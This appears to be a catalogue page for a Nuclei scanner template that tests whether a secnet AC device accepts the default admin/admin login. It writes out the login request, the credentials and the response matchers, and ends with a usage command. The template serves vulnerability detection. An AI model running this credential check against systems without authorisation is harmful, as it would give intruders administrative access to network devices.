Skip to content

secnet ac - Default Admin Login

ID: secnet-ac-default-password

Severity: high

Author: ritikchaddha

Tags: default-login,secnet

secnet ac default admin credentials were successful.

id: secnet-ac-default-password
info:
name: secnet ac - Default Admin Login
author: ritikchaddha
severity: high
description: secnet ac default admin credentials were successful.
reference:
- https://bbs.secnet.cn/post/t-30
metadata:
max-request: 1
tags: default-login,secnet
http:
- raw:
- |
POST /login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- "window.open('index.htm"
- type: word
part: header
words:
- "ac_userid={{username}},ac_passwd="
- type: status
status:
- 200
# digest: 4b0a00483046022100dcf4f42ac61828c54d775dd313fa4b104e53acbfd60c79434646cb1c456de8b7022100d4fc2cd518ad4dd19d8df179c00fda9ceee48600efb04c45c23ecc055bd2cf89:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/others/secnet-ac-default-login.yaml"

View on Github